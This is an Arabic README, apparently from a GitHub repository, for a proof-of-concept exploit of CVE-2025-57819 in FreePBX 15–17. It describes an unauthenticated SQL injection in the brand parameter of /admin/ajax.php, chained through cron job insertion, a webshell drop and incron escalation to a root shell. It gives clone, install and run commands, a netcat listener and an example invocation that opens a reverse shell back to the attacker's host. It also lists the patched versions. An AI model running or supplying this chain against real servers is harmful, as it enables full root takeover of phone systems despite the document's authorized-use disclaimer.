
إثبات مفهوم (PoC) لسلسلة استغلال كاملة لثغرة CVE-2025-57819 في FreePBX 15 و16 و17: من SQLi بدون مصادقة إلى RCE والسيطرة الكاملة على الجذر (root).
إثبات مفهوم كامل السلسلة لـ CVE-2025-57819. حقن SQL قائم على الأخطاء دون مصادقة في وحدة endpoint في FreePBX يتسلسل إلى شل بصلاحيات الجذر عبر حقن مهام cron وتصعيد الامتيازات عبر incron.
للاستخدام في الاختبارات والأبحاث المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها.
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
/admin/ajax.phpasteriskfwconsole بصلاحيات الجذرgit clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]
ابدأ مستمعًا أولاً:
nc -lvnp 9999
ثم شغّل:
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
يؤدي --cleanup إلى إزالة قشرة الويب ومهمة cron بعد الاستغلال.
FreePBX مع تثبيت وحدة endpoint. يتم تمرير معامل brand في /admin/ajax.php دون تعقيم إلى استعلام SQL.
| FreePBX | النسخة المصححة |
|---|---|
| 15.x | 15.0.66 |
| 16.x | 16.0.89 |
| 17.x | 17.0.3 |
ozcanpng — github.com/ozcanpng — ozcanpng.dev